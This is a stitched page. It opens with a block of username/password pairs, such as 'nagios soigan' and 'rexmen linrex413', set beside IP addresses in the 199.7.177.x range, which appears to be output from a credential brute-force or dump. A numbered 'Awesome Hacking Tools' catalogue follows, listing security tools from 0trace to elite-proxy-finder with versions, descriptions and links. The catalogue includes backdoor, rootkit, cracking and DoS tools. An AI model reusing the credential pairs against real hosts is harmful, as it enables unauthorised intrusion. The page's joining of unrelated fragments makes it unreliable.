cyrus cyrus 199.7.177.213 | no host iraf iraf 199.7.177.227 | no host production production 199.7.177.221 | no host swsoft swsoft 199.7.177.223 | no host nagios nagios 199.7.177.219 | no host devilsins devilsins 199.7.177.235 | no host root states 199.7.177.229 | no host hermes hermes 199.7.177.213 | no host swsoft swsoft 199.7.177.227 | no host guest guestaccount 199.7.177.221 | no host production production 199.7.177.223 | no host nagios soigan 199.7.177.219 | no host rexmen linrex413 199.7.177.235 | no host
  24. # Awesome Hacking Tools ___________________________________________________________________________________________________________ * __0trace__ 1.5 A hop enumeration tool http://jon.oberheide.org/0trace/ * __3proxy__ 0.7.1.1 Tiny free proxy server. http://3proxy.ru/ * __3proxy-win32__ 0.7.1.1 Tiny free proxy server. http://3proxy.ru/ * __42zip 42__ Recursive Zip archive bomb. http://blog.fefe.de/?ts=b6cea88d * __acccheck__ 0.2.1 A password dictionary attack tool that targets windows authentication via the SMB protocol. http://labs.portcullis.co.uk/tools/acccheck/ * __ace 1.10__ Automated Corporate Enumerator. A simple yet powerful VoIP Corporate Directory enumeration tool that mimics the behavior of an IP Phone in order to download the name and extension entries that a given phone can display on its screen interface http://ucsniff.sourceforge.net/ace.html * __admid-pack 0.1__ ADM DNS spoofing tools - Uses a variety of active and passive methods to spoof DNS packets. Very powerful. http://packetstormsecurity.com/files/10080/ADMid-pkg.tgz.html * __adminpagefinder 0.1__ This python script looks for a large amount of possible administrative interfaces on a given site. http://packetstormsecurity.com/files/112855/Admin-Page-Finder-Script.html * __admsnmp 0.1__ ADM SNMP audit scanner. * __aesfix 1.0.1__ A tool to find AES key in RAM http://citp.princeton.edu/memory/code/ * __aeskeyfind 1.0__ A tool to find AES key in RAM http://citp.princeton.edu/memory/code/ * __aespipe 2.4c__ Reads data from stdin and outputs encrypted or decrypted results to stdout. http://loop-aes.sourceforge.net/aespipe/ * __afflib 3.7.3__ An extensible open format for the storage of disk images and related forensic information. http://www.afflib.org * __afpfs-ng 0.8.1__ A client for the Apple Filing Protocol (AFP) http://alexthepuffin.googlepages.com/ * __against 0.2__ A very fast ssh attacking script which includes a multithreaded port scanning module (tcp connect) for discovering possible targets and a multithreaded brute-forcing module which attacks parallel all discovered hosts or given ip addresses from a list. http://nullsecurity.net/tools/cracker.html * __aiengine 339.58dfb85__ A packet inspection engine with capabilities of learning without any human intervention. https://bitbucket.org/camp0/aiengine/ * __aimage 3.2.5__ A program to create aff-images. http://www.afflib.org * __air 2.0.0__ A GUI front-end to dd/dc3dd designed for easily creating forensic images. http://air-imager.sourceforge.net/ * __airflood 0.1__ A modification of aireplay that allows for a DOS in in the AP. This program fills the table of clients of the AP with random MACs doing impossible new connections. http://packetstormsecurity.com/files/51127/airflood.1.tar.gz.html * __airgraph-ng 2371__ Graphing tool for the aircrack suite http://www.aircrack-ng.org * __airoscript 45.0a122ee__ A script to simplify the use of aircrack-ng tools. http://midnightresearch.com/projects/wicrawl/ * __airpwn 1.4__ A tool for generic packet injection on an 802.11 network. http://airpwn.sourceforge.net * __allthevhosts 1.0__ A vhost discovery tool that scrapes various web applications http://labs.portcullis.co.uk/tools/finding-all-the-vhosts/ * __american-fuzzy-lop 0.89b__ A practical, instrumentation-driven fuzzer for binary formats. https://code.google.com/p/american-fuzzy-lop/ * __androguard 1.9__ Reverse engineering, Malware and goodware analysis of Android applications and more. https://code.google.com/p/androguard/ * __androick 5.35048d7__ A python tool to help in forensics analysis on android. https://github.com/Flo354/Androick * __android-apktool 1.5.2__ A tool for reengineering Android apk files. http://forum.xda-developers.com/showthread.php?t=1755243 * __android-ndk r9c__ Android C/C++ developer kit. http://developer.android.com/sdk/ndk/index.html * __android-sdk-platform-tools r19__ Platform-Tools for Google Android SDK (adb and fastboot) http://developer.android.com/sdk/index.html * __android-sdk r22.3__ Google Android SDK http://developer.android.com/sdk/index.html * __android-udev-rules 8340.db8ef4a__ Android udev rules. https://github.com/bbqlinux/android-udev-rules * __androidsniffer 0.1__ A perl script that lets you search for 3rd party passwords, dump the call log, dump contacts, dump wireless configuration, and more. http://packetstormsecurity.com/files/97464/Andr01d-Magic-Dumper.1.html * __anontwi 1.0__ A free software python client designed to navigate anonymously on social networks. It supports Identi.ca and Twitter.com. http://anontwi.sourceforge.net/ * __aphopper 0.3__ AP Hopper is a program that automatically hops between access points of different wireless networks. http://aphopper.sourceforge.net/ * __apnbf 0.1__ A small python script designed for enumerating valid APNs (Access Point Name) on a GTP-C speaking device. http://www.c0decafe.de/ * __arachni 1.0.6__ A feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications. https://www.arachni-scanner.com * __arduino 1.0.5__ Arduino SDK (includes patched avrdude and librxtx) http://arduino.cc/en/Main/Software * __argus 3.0.8__ Network monitoring tool with flow control. http://qosient.com/argus/ * __argus-clients 3.0.8__ Network monitoring client for Argus. http://qosient.com/argus/ * __armitage 141120__ A graphical cyber attack management tool for Metasploit. http://www.fastandeasyhacking.com/ * __arp-scan 1.9__ A tool that uses ARP to discover and fingerprint IP hosts on the local network http://www.nta-monitor.com/tools/arp-scan/ * __arpalert 2.0.12__ Monitor ARP changes in ethernet networks http://www.arpalert.org/ * __arpantispoofer 1.0.1.32__ A utility to detect and resist BIDIRECTIONAL ARP spoofing. It can anti-spoof for not only the local host, but also other hosts in the same subnet. It is also a handy helper for gateways which don't work well with ARP. http://arpantispoofer.sourceforge.net/ * __arpoison 0.6__ The UNIX arp cache update utility http://www.arpoison.net * __arpon 2.7__ A portable handler daemon that make ARP protocol secure in order to avoid the Man In The Middle (MITM) attack through ARP Spoofing, ARP Cache Poisoning or ARP Poison Routing (APR) attacks. http://arpon.sourceforge.net/ * __arpwner 26.f300fdf__ GUI-based python tool for arp posioning and dns poisoning attacks. https://github.com/ntrippar/ARPwner * __artillery 1.0.2__ A combination of a honeypot, file-system monitoring, system hardening, and overall health of a server to create a comprehensive way to secure a system https://www.trustedsec.com/downloads/artillery/ * __asleap 2.2__ Actively recover LEAP/PPTP passwords. http://www.willhackforsushi.com/Asleap.html * __asp-audit 2BETA__ An ASP fingerprinting tool and vulnerability scanner. http://seclists.org/basics/2006/Sep/128 * __athena-ssl-scanner 0.5.2__ a SSL cipher scanner that checks all cipher codes. It can identify about 150 different ciphers. http://packetstormsecurity.com/files/93062/Athena-SSL-Cipher-Scanner.html * __atstaketools 0.1__ This is an archive of various @Stake tools that help perform vulnerability scanning and analysis, information gathering, password auditing, and forensics. http://packetstormsecurity.com/files/50718/AtStakeTools.zip.html * __auto-xor-decryptor 3.6a1f8f7__ Automatic XOR decryptor tool. http://www.blog.mrg-effitas.com/publishing-of-mrg-effitas-automatic-xor-decryptor-tool/ * __autopsy 2.24__ A GUI for The Sleuth Kit. http://www.sleuthkit.org/autopsy * __azazel 10.401e3aa__ A userland rootkit based off of the original LD_PRELOAD technique from Jynx rootkit. https://github.com/chokepoint/azazel * __b2sum 20140114__ BLAKE2 file hash sum check. Computes the BLAKE2 (BLAKE2b or -s, -bp, -sp) cryptographic hash of a given file. https://blake2.net/ * __backcookie 44.cbf5b8b__ Small backdoor using cookie. https://github.com/mrjopino/backcookie * __backdoor-factory 98.89d87b2__ Patch win32/64 binaries with shellcode. https://github.com/secretsquirrel/the-backdoor-factory * __backfuzz 36.8e54ed6__ A network protocol fuzzing toolkit. https://github.com/localh0t/backfuzz * __balbuzard 65.546c5dcf629c__ A package of malware analysis tools in python to extract patterns of interest from suspicious files (IP addresses, domain names, known file headers, interesting strings, etc). https://bitbucket.org/decalage/balbuzard/ * __bamf-framework 35.30d2b4b__ A modular framework designed to be a platform to launch attacks against botnets. https://github.com/bwall/BAMF * __basedomainname 0.1__ Tool that can extract TLD (Top Level Domain), domain extensions (Second Level Domain + TLD), domain name, and hostname from fully qualified domain names. http://www.morningstarsecurity.com/research * __batman-adv 2013.4.0__ batman kernel module, (included upstream since .38) http://www.open-mesh.net/ * __bbqsql 1.2__ SQL injection exploitation tool. https://github.com/neohapsis/bbqsql * __bdfproxy 38.43e83e4__ Patch Binaries via MITM: BackdoorFactory + mitmProxy https://github.com/secretsquirrel/BDFProxy * __bed 0.5__ Collection of scripts to test for buffer overflows, format string vulnerabilities. http://www.aldeid.com/wiki/Bed * __beef 0.4.5.0.181.g80a9f8e__ The Browser Exploitation Framework that focuses on the web browser http://beefproject.com/ * __beholder 0.8.9__ A wireless intrusion detection tool that looks for anomalies in a wifi environment. http://www.beholderwireless.org/ * __beleth 36.0963699__ A Multi-threaded Dictionary based SSH cracker. https://github.com/chokepoint/Beleth * __bfbtester 2.0.1__ Performs checks of single and multiple argument command line overflows and environment variable overflows http://sourceforge.net/projects/bfbtester/ * __bgp-md5crack 0.1__ RFC2385 password cracker http://www.c0decafe.de/ * __bing-ip2hosts 0.4__ Enumerates all hostnames which Bing has indexed for a specific IP address. http://www.morningstarsecurity.com/research/bing-ip2hosts * __bing-lfi-rfi 0.1__ This is a python script for searching Bing for sites that may have local and remote file inclusion vulnerabilities. http://packetstormsecurity.com/files/121590/Bing-LFI-RFI-Scanner.html * __binwalk 2.0.1__ A tool for searching a given binary image for embedded files. http://binwalk.org * __binwally 3.ca092a7__ Binary and Directory tree comparison tool using the Fuzzy Hashing concept (ssdeep). https://github.com/bmaia/binwally * __bios_memimage 1.2__ A tool to dump RAM contents to disk (aka cold boot attack). http://citp.princeton.edu/memory/code/ * __birp 60.1d7c49f__ A tool that will assist in the security assessment of mainframe applications served over TN3270. https://github.com/sensepost/birp * __bittwist 2.0__ A simple yet powerful libpcap-based Ethernet packet generator. It is designed to complement tcpdump, which by itself has done a great job at capturing network traffic. http://bittwist.sourceforge.net/ * __bkhive 1.1.1__ Program for dumping the syskey bootkey from a Windows NT/2K/XP system hive. http://sourceforge.net/projects/ophcrack * __blackarch-menus 0.2__ BlackArch specific XDG-compliant menu http://www.blackarch.org/ * __blackhash 0.2__ Creates a filter from system hashes http://16s.us/blackhash/ * __bletchley 0.0.1__ A collection of practical application cryptanalysis tools. https://code.google.com/p/bletchley/ * __blindelephant 7__ A web application fingerprinter. Attempts to discover the version of a (known) web application by comparing static files at known locations http://blindelephant.sourceforge.net/ * __blindsql 1.0__ Set of bash scripts for blind SQL injection attacks http://www.enye-sec.org/programas.html * __bluebox-ng 66.4a73bb4__ A GPL VoIP/UC vulnerability scanner. https://github.com/jesusprubio/bluebox-ng * __bluebugger 0.1__ An implementation of the bluebug technique which was discovered by Martin Herfurt. http://packetstormsecurity.com/files/54024/bluebugger.1.tar.gz.html * __bluelog 1.1.1__ A Bluetooth scanner and sniffer written to do a single task, log devices that are in discoverable mode. http://www.digifail.com/software/bluelog.shtml * __bluepot 0.1__ A Bluetooth Honeypot written in Java, it runs on Linux https://code.google.com/p/bluepot/ * __blueprint 0.1_3__ A perl tool to identify Bluetooth devices. http://trifinite.org/trifinite_stuff_blueprinting.html * __blueranger 1.0__ A simple Bash script which uses Link Quality to locate Bluetooth device radios. http://www.hackfromacave.com/projects/blueranger.html * __bluesnarfer 0.1__ A bluetooth attacking tool http://www.alighieri.org/project.html * __bmap-tools 3.2__ Tool for copying largely sparse files using information from a block map file. http://git.infradead.org/users/dedekind/bmap-tools.git * __bob-the-butcher 0.7.1__ A distributed password cracker package. http://btb.banquise.net/ * __bokken 376.caaa65c431a8__ GUI for radare2 and pyew. http://inguma.eu/projects/bokken/ * __bowcaster 0.1__ This framework, implemented in Python, is intended to aid those developing exploits by providing useful set of tools and modules, such as payloads, encoders, connect-back servers, etc. Currently the framework is focused on the MIPS CPU architecture, but the design is intended to be modular enough to support arbitrary architectures. https://github.com/zcutlip/bowcaster * __braa 0.82__ A mass snmp scanner http://s-tech.elsat.net.pl/braa/ * __braces 0.4__ A Bluetooth Tracking Utility. http://braces.shmoo.com/ * __browser-fuzzer__ 3 Browser Fuzzer 3 http://www.krakowlabs.com/dev.html * __brutessh 0.5__ A simple sshd password bruteforcer using a wordlist, it's very fast for internal networks. It's multithreads. http://www.edge-security.com/edge-soft.php * __brutus 2__ One of the fastest, most flexible remote password crackers you can get your hands on. http://www.hoobie.net/brutus/ * __bsdiff 4.3__ bsdiff and bspatch are tools for building and applying patches to binary files. http://www.daemonology.net/bsdiff/ * __bsqlbf 2.7__ Blind SQL Injection Brute Forcer. http://code.google.com/p/bsqlbf-v2/ * __bss 0.8__ Bluetooth stack smasher / fuzzer http://www.secuobs.com/news/15022006-bss_0_8.shtml * __bt_audit 0.1.1__ Bluetooth audit http://www.betaversion.net/btdsd/download/ * __btcrack 1.1__ The world's first Bluetooth Pass phrase (PIN) bruteforce tool. Bruteforces the Passkey and the Link key from captured Pairing exchanges. http://www.nruns.com/_en/security_tools_btcrack.php * __btscanner 2.1__ Bluetooth device scanner. http://www.pentest.co.uk * __bulk-extractor 1.5.5__ Bulk Email and URL extraction tool. https://github.com/simsong/bulk_extractor * __bully 19.ba33677__ A wifi-protected-setup (WPS) brute force attack tool. http://code.google.com/p/bully/ * __bunny 0.93__ A closed loop, high-performance, general purpose protocol-blind fuzzer for C programs. http://code.google.com/p/bunny-the-fuzzer/ * __burpsuite 1.6__ An integrated platform for attacking web applications (free edition). http://portswigger.net/burp/ * __buttinsky 138.1a2a1b2__ Provide an open source framework for automated botnet monitoring. https://github.com/buttinsky/buttinsky * __bvi 1.4.0beta__ A display-oriented editor for binary files operate like "vi" editor. http://bvi.sourceforge.net/ * __cadaver 0.23.3__ Command-line WebDAV client for Unix http://www.webdav.org/cadaver * __canari 1.1__ A transform framework for maltego http://www.canariproject.com/ * __cansina 93.abc6577__ A python-based Web Content Discovery Tool. https://github.com/deibit/cansina * __capstone 3.0__ A lightweight multi-platform, multi-architecture disassembly framework. http://www.capstone-engine.org/index.html * __carwhisperer 0.2__ Intends to sensibilise manufacturers of carkits and other Bluetooth appliances without display and keyboard for the possible security threat evolving from the use of standard passkeys. http://trifinite.org/trifinite_stuff_carwhisperer.html * __casefile 1.0.1__ The little brother to Maltego without transforms, but combines graph and link analysis to examine links between manually added data to mind map your information http://www.paterva.com/web6/products/casefile.php * __cdpsnarf 0.1.6__ Cisco discovery protocol sniffer. https://github.com/Zapotek/cdpsnarf * __cecster 5.15544cb__ A tool to perform security testing against the HDMI CEC (Consumer Electronics Control) and HEC (HDMI Ethernet Channel) protocols https://github.com/nccgroup/CECster * __centry 72.6de2868__ Cold boot & DMA protection https://github.com/0xPoly/Centry * __cewl 4.3__ A custom word list generator http://www.digininja.org/projects/cewl.php * __cflow 1.4__ A C program flow analyzer. http://www.gnu.org/software/cflow/ * __chaosmap 1.3__ An information gathering tool and dns / whois / web server scanner http://freecode.com/projects/chaosmap * __chaosreader 0.94__ A freeware tool to trace tcp, udp etc. sessions and fetch application data from snoop or tcpdump logs. http://chaosreader.sourceforge.net/ * __chapcrack 17.ae2827f__ A tool for parsing and decrypting MS-CHAPv2 network handshakes. https://github.com/moxie0/chapcrack * __check-weak-dh-ssh 0.1__ Debian OpenSSL weak client Diffie-Hellman Exchange checker. http://packetstormsecurity.com/files/66683/check_weak_dh_ssh.pl.bz2.html * __checkiban 0.2__ Checks the validity of an International Bank Account Number (IBAN). http://kernel.embedromix.ro/us/ * __checkpwd 1.23__ Oracle Password Checker (Cracker) http://www.red-database-security.com/software/checkpwd.html * __checksec 1.5__ The checksec.sh script is designed to test what standard Linux OS and PaX security features are being used. http://www.trapkit.de/tools/checksec.html * __chiron 0.7__ An all-in-one IPv6 Penetration Testing Framework. http://www.secfu.net/tools-scripts/ * __chkrootkit 0.50__ Checks for rootkits on a system http://www.chkrootkit.org/ * __chntpw 140201__ Offline NT Password Editor - reset passwords in a Windows NT SAM user database file http://pogostick.net/~pnh/ntpasswd/ * __chownat 0.08b__ Allows two peers behind two separate NATs with no port forwarding and no DMZ setup on their routers to directly communicate with each other http://samy.pl/chownat/ * __chrome-decode 0.1__ Chrome web browser decoder tool that demonstrates recovering passwords. http://packetstormsecurity.com/files/119153/Chrome-Web-Browser-Decoder.html * __chromefreak 22.336e323__ A Cross-Platform Forensic Framework for Google Chrome http://osandamalith.github.io/ChromeFreak/ * __cidr2range 0.9__ Script for listing the IP addresses contained in a CIDR netblock http://www.cpan.org/authors/id/R/RA/RAYNERLUC * __ntruder 0.2.0__ An automatic pentesting tool to bypass captchas. http://cintruder.sourceforge.net/ * __ciphertest 14.7f49ea7__ A better SSL cipher checker using gnutls. https://github.com/OpenSecurityResearch/ciphertest * __cirt-fuzzer 1.0__ A simple TCP/UDP protocol fuzzer. http://www.cirt.dk/ * __cisco-auditing-tool 1__ Perl script which scans cisco routers for common vulnerabilities. Checks for default passwords, easily guessable community names, and the IOS history bug. Includes support for plugins and scanning multiple hosts. http://www.scrypt.net * __cisco-global-exploiter 1.3__ A perl script that targets multiple vulnerabilities in the Cisco Internetwork Operating System (IOS) and Catalyst products. http://www.blackangels.it * __cisco-ocs 0.2__ Cisco Router Default Password Scanner. http://www.question-defense.com/2013/01/11/ocs-version-2-release-ocs-cisco-router-default-password-scanner * __cisco-router-config 1.1__ copy-router-config and merge-router-config to copy and merge Cisco Routers Configuration * __cisco-scanner 0.2__ Multithreaded Cisco HTTP vulnerability scanner. Tested on Linux, OpenBSD and Solaris. http://wayreth.eu.org/old_page/ * __cisco-torch 0.4b__ Cisco Torch mass scanning, fingerprinting, and exploitation tool. http://www.arhont.com * __cisco5crack 2.c4b228c__ Crypt and decrypt the cisco enable 5 passwords. https://github.com/madrisan/cisco7crack * __cisco7crack 2.f1c21dd__ Crypt and decrypt the cisco enable 7 passwords. https://github.com/madrisan/cisco7crack * __ciscos 1.3__ Scans class A, B, and C networks for cisco routers which have telnet open and have not changed the default password from cisco. * __climber 23.f614304__ Check UNIX/Linux systems for privilege escalation. https://github.com/raffaele-forte/climber * __clusterd 129.0f04a49__ Automates the fingerprinting, reconnaissance, and exploitation phases of an application server attack. https://github.com/hatRiot/clusterd * __cmospwd 5.0__ Decrypts password stored in CMOS used to access BIOS setup. http://www.cgsecurity.org/wiki/CmosPwd * __cms-explorer 1.0__ Designed to reveal the specific modules, plugins, components and themes that various cms driven websites are running http://code.google.com/p/cms-explorer * __cms-few 0.1__ Joomla, Mambo, PHP-Nuke, and XOOPS CMS SQL injection vulnerability scanning tool written in Python. http://packetstormsecurity.com/files/64722/cms_few.py.txt.html * __codetective 37.f94d9e8__ A tool to determine the crypto/encoding algorithm used according to traces of its representation. https://www.digitalloft.org/init/plugin_wiki/page/codetective * __complemento 0.7.6__ A collection of tools for pentester: LetDown is a powerful tcp flooder ReverseRaider is a domain scanner that use wordlist scanning or reverse resolution scanning Httsquash is an http server scanner, banner grabber and data retriever http://complemento.sourceforge.net * __conpot 0.3.1__ ICS honeypot with the goal to collect intelligence about the motives and methods of adversaries targeting industrial control systems url="http://conpot.org" * __conscan 1.1__ A blackbox vulnerability scanner for the Concre5 CMS. http://nullsecurity.net/tools/scanner.html * __cookie-cadger 1.07__ An auditing tool for Wi-Fi or wired Ethernet connections. https://cookiecadger.com/ * __cowpatty 4.6__ Wireless WPA/WPA2 PSK handshake cracking utility http://www.wirelessdefence.org/Contents/Files/ * __cpfinder 0.1__ This is a simple script that looks for administrative web interfaces. http://packetstormsecurity.com/files/118851/Control-Panel-Finder-Script.html * __cppcheck 1.67__ A tool for static C/C++ code analysis http://cppcheck.wiki.sourceforge.net/ * __cpptest 1.1.2__ A portable and powerful, yet simple, unit testing framework for handling automated tests in C++. http://cpptest.sourceforge.net/ * __crackhor 2.ae7d83f__ A Password cracking utility. https://github.com/CoalfireLabs/crackHOR * __crackle 39.3e93196__ Crack and decrypt BLE encryption https://github.com/mikeryan/crackle/ * __crackserver 31.c268a80__ An XMLRPC server for password cracking. https://github.com/averagesecurityguy/crack * __create-ap 112.1c89b44__ This script creates a NATed or Bridged WiFi Access Point. https://github.com/oblique/create_ap * __creddump 0.3__ A python tool to extract various credentials and secrets from Windows registry hives. https://code.google.com/p/creddump/ * __creds 8340.db8ef4a__ Harvest FTP/POP/IMAP/HTTP/IRC credentials along with interesting data from each of the protocols. https://github.com/DanMcInerney/creds.py * __creepy 137.9f60449__ A geolocation information gatherer. Offers geolocation information gathering through social networking platforms. http://github.com/ilektrojohn/creepy.git * __crunch 3.6__ A wordlist generator for all combinations/permutations of a given character set. http://sourceforge.net/projects/crunch-wordlist/ * __cryptcat 1.2.1__ A lightweight version of netcat with integrated transport encryption capabilities. http://sourceforge.net/projects/cryptcat * __crypthook__ 17.0728cd1 TCP/UDP symmetric encryption tunnel wrapper. https://github.com/chokepoint/CryptHook * __cryptonark 0.4.9__ SSL security checker. http://blog.techstacks.com/cryptonark.html * __csrftester 1.0__ The OWASP CSRFTester Project attempts to give developers the ability to test their applications for CSRF flaws. http://www.owasp.org/index.php/Category:OWASP_CSRFTester_Project * __ctunnel 0.6__ Tunnel and/or proxy TCP or UDP connections via a cryptographic tunnel. http://nardcore.org/ctunnel * __cuckoo 1.1.1__ A malware analysis system. http://cuckoosandbox.org/ * __cupp 3.0__ Common User Password Profiler http://www.remote-exploit.org/?page_id=418 * __cutycapt 10__ A Qt and WebKit based command-line utility that captures WebKit's rendering of a web page. http://cutycapt.sourceforge.net/ * __cvechecker 3.5__ The goal of cvechecker is to report about possible vulnerabilities on your system, by scanning the installed software and matching the results with the CVE database. http://cvechecker.sourceforge.net/ * __cymothoa 1__ A stealth backdooring tool, that inject backdoor's shellcode into an existing process. http://cymothoa.sourceforge.net/ * __darkbing 0.1__ A tool written in python that leverages bing for mining data on systems that may be susceptible to SQL injection. http://packetstormsecurity.com/files/111510/darkBing-SQL-Scanner.1.html * __darkd0rk3r 1.0__ Python script that performs dork searching and searches for local file inclusion and SQL injection errors. http://packetstormsecurity.com/files/117403/Dark-D0rk3r.0.html * __darkjumper 5.8__ This tool will try to find every website that host at the same server at your target http://sourceforge.net/projects/darkjumper/ * __darkmysqli 1.6__ Multi-Purpose MySQL Injection Tool https://github.com/BlackArch/darkmysqli * __darkstat 3.0.718__ Network statistics gatherer (packet sniffer) http://dmr.ath.cx/net/darkstat/ * __davoset 1.2.3__ A tool for using Abuse of Functionality and XML External Entities vulnerabilities on some websites to attack other websites. http://websecurity.com.ua/davoset/ * __davtest 1.0__ Tests WebDAV enabled servers by uploading test executable files, and then (optionally) uploading files which allow for command execution or other actions directly on the target http://code.google.com/p/davtest/ * __dbd 1.50__ A Netcat-clone, designed to be portable and offer strong encryption. It runs on Unix-like operating systems and on Microsoft Win32. https://github.com/gitdurandal/dbd * __dbpwaudit 0.8__ A Java tool that allows you to perform online audits of password quality for several database engines http://www.cqure.net/wp/dbpwaudit/ * __dc3dd 7.1.614__ A patched version of dd that includes a number of features useful for computer forensics http://sourceforge.net/projects/dc3dd * __dcfldd 1.3.4.1__ DCFL (DoD Computer Forensics Lab) dd replacement with hashing http://dcfldd.sourceforge.net/ * __ddrescue 1.19__ GNU data recovery tool http://www.gnu.org/software/ddrescue/ddrescue.html * __deblaze 0.3__ A remote method enumeration tool for flex servers http://deblaze-tool.appspot.com/ * __delldrac 0.1a__ DellDRAC and Dell Chassis Discovery and Brute Forcer. https://www.trustedsec.com/september/owning-dell-drac-awesome-hack/ * __depant 0.3a__ Check network for services with default passwords. http://midnightresearch.com/projects/depant/ * __device-pharmer__ 35.c1d449e Opens 1K+ IPs or Shodan search results and attempts to login. https://github.com/DanMcInerney/device-pharmer * __dex2jar 0.0.9.13__ A tool for converting Android's .dex format to Java's .class format http://code.google.com/p/dex2jar * __dff-scanner 1.1__ Tool for finding path of predictable resource locations. http://netsec.rs/70/tools.html * __dhcdrop 0.5__ Remove illegal dhcp servers with IP-pool underflow. Stable version http://www.netpatch.ru/dhcdrop.html * __dhcpig 69.cc4109a__ Enumerates hosts, subdomains, and emails from a given domain using google https://github.com/kamorin/DHCPig * __dinouml 0.9.5__ A network simulation tool, based on UML (User Mode Linux) that can simulate big Linux networks on a single PC http://kernel.embedromix.ro/us/ * __dirb 2.04__ A web content scanner, brute forceing for hidden files http://dirb.sourceforge.net/ * __dirbuster 1.0_RC1__ An application designed to brute force directories and files names on web/application servers http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project * __directorytraversalscan 1.0.1.0__ Detect directory traversal vulnerabilities in HTTP servers and web applications. http://sourceforge.net/projects/httpdirscan/ * __dirs3arch 119.6a3b68a__ HTTP(S) directory/file brute forcer. https://github.com/maurosoria/dirs3arch * __dirscanner 0.1__ This is a python script that scans webservers looking for administrative directories, php shells, and more. http://packetstormsecurity.com/files/117773/Directory-Scanner-Tool.html * __dislocker 0.3__ A tool to exploit the hash length extension attack in various hashing algorithms. With FUSE capabilities built in. http://www.hsc.fr/ressources/outils/dislocker/ * __dissector 1__ This code dissects the internal data structures in ELF files. It supports x86 and x86_64 archs and runs under Linux. http://packetstormsecurity.com/files/125972/Coloured-ELF-File-Dissector.html * __dissy 10__ A graphical frontend to the objdump disassembler for compiler-generated code. http://dissy.googlecode.com/ * __dizzy 0.8.2__ A Python based fuzzing framework with many features. http://www.c0decafe.de/ * __dmitry 1.3a__ Deepmagic Information Gathering Tool. Gathers information about hosts. It is able to gather possible subdomains, email addresses, and uptime information and run tcp port scans, whois lookups, and more. http://www.mor-pah.net/ * __dnmap 0.6__ The distributed nmap framework http://sourceforge.net/projects/dnmap/ * __dns-spoof 12.3918a10__ Yet another DNS spoof utility. https://github.com/maurotfilho/dns-spoof * __dns2geoip 0.1__ A simple python script that brute forces DNS and subsequently geolocates the found subdomains. http://packetstormsecurity.com/files/118036/DNS-GeoIP.html * __dns2tcp 0.5.2__ A tool for relaying TCP connections over DNS. http://www.hsc.fr/ressources/outils/dns2tcp/index.html.en * __dnsa 0.5__ DNSA is a dns security swiss army knife http://packetfactory.openwall.net/projects/dnsa/index.html * __dnsbf 0.2__ search for available domain names in an IP range http://code.google.com/p/dnsbf * __dnsbrute 2.b1dc84a__ Multi-theaded DNS bruteforcing, average speed 80 lookups/second with 40 threads. https://github.com/d4rkcat/dnsbrute * __dnschef 0.3__ A highly configurable DNS proxy for pentesters. http://thesprawl.org/projects/dnschef/ * __dnsdrdos 0.1__ Proof of concept code for distributed DNS reflection DoS http://nullsecurity.net/tools/dos.html * __dnsenum 1.2.4.1__ Script that enumerates DNS information from a domain, attempts zone transfers, performs a brute force dictionary style attack, and then performs reverse look-ups on the results. http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=dnsenum * __dnsgoblin 0.1__ Nasty creature constantly searching for DNS servers. It uses standard dns querys and waits for the replies http://nullsecurity.net/tools/scanner.html * __dnsmap 0.30__ Passive DNS network mapper http://dnsmap.googlecode.com * __dnspredict 0.0.2__ DNS prediction http://johnny.ihackstuff.com * __dnsrecon 0.8.8__ Python script for enumeration of hosts, subdomains and emails from a given domain using google. https://github.com/darkoperator/dnsrecon * __dnsspider 0.5__ A very fast multithreaded bruteforcer of subdomains that leverages a wordlist and/or character permutation. http://nullsecurity.net/tools/scanner.html * __dnstracer 1.9__ Determines where a given DNS server gets its information from, and follows the chain of DNS servers http://www.mavetju.org/unix/dnstracer.php * __dnsutils 9.9.2.P2__ DNS utilities: dig host nslookup http://www.isc.org/software/bind/ * __dnswalk 2.0.2__ A DNS debugger http://sourceforge.net/projects/dnswalk/ * __domain-analyzer 0.8.1__ Finds all the security information for a given domain name. http://sourceforge.net/projects/domainanalyzer/ * __doona 118.ff1e17b__ A fork of the Bruteforce Exploit Detector Tool (BED). https://github.com/wireghoul/doona * __dotdotpwn 3.0__ The Transversal Directory Fuzzer http://dotdotpwn.blogspot.com * __dpeparser beta002__ Default password enumeration project http://www.toolswatch.org/dpe/ * __dpscan 0.1__ Drupal Vulnerabilty Scanner. https://github.com/insaneisnotfree/Blue-Sky-Information-Security * __dradis 2.9.0__ An open source framework to enable effective information sharing. http://dradisframework.org/ * __driftnet 0.1.6__ Listens to network traffic and picks out images from TCP streams it observes. http://www.ex-parrot.com/~chris/driftnet/ * ___dripper v1.r1.gc9bb0c9__ A fast, asynchronous DNS scanner; it can be used for enumerating subdomains and enumerating boxes via reverse DNS. http://www.blackhatlibrary.net/Dripper * __dscanner 709.f00026f__ Swiss-army knife for D source code. https://github.com/Hackerpilot/Dscanner * __dsd 84.60807e0__ Digital Speech Decoder https://github.com/szechyjs/dsd * __dsniff 2.4b1__ Collection of tools for network auditing and penetration testing http://www.monkey.org/~dugsong/dsniff/ * __dumb0 19.1493e74__ A simple tool to dump users in popular forums and CMS. https://github.com/0verl0ad/Dumb0 * __dump1090 386.bff92c4__ A simple Mode S decoder for RTLSDR devices. https://github.com/MalcolmRobb/dump1090 * __dumpacl 0.0__ Dumps NTs ACLs and audit settings. http://www.systemtools.com/cgi-bin/download.pl?DumpAcl * __dumpzilla 03152013__ A forensic tool for firefox. http://www.dumpzilla.org/ * __eapmd5pass 1.4__ An implementation of an offline dictionary attack against the EAP-MD5 protocol http://www.willhackforsushi.com/?page_id=67 * __easy-creds 3.9 A__ bash script that leverages ettercap and other tools to obtain credentials. https://github.com/brav0hax/easy-creds * __easyfuzzer 3.6__ A flexible fuzzer, not only for web, has a CSV output for efficient output analysis (platform independant). http://www.mh-sec.de/downloads.html.en * __eazy 0.1__ This is a small python tool that scans websites to look for PHP shells, backups, admin panels, and more. http://packetstormsecurity.com/files/117572/EAZY-Web-Scanner.html * __edb 0.9.20__ A QT4-based binary mode debugger with the goal of having usability on par with OllyDbg. http://www.codef00.com/projects.php#Debugger * __eindeutig 20050628_1__ Examine the contents of Outlook Express DBX email repository files (forensic purposes) http://www.jonesdykstra.com/ * __elettra 1.0__ Encryption utility by Julia Identity http://www.winstonsmith.info/julia/elettra/ * __elettra-gui 1.0__ Gui for the elettra crypto application. http://www.winstonsmith.info/julia/elettra/ * __elite-proxy-finder 42.b92f75a__ Finds public elite anonymity proxies and concurrently tests them. 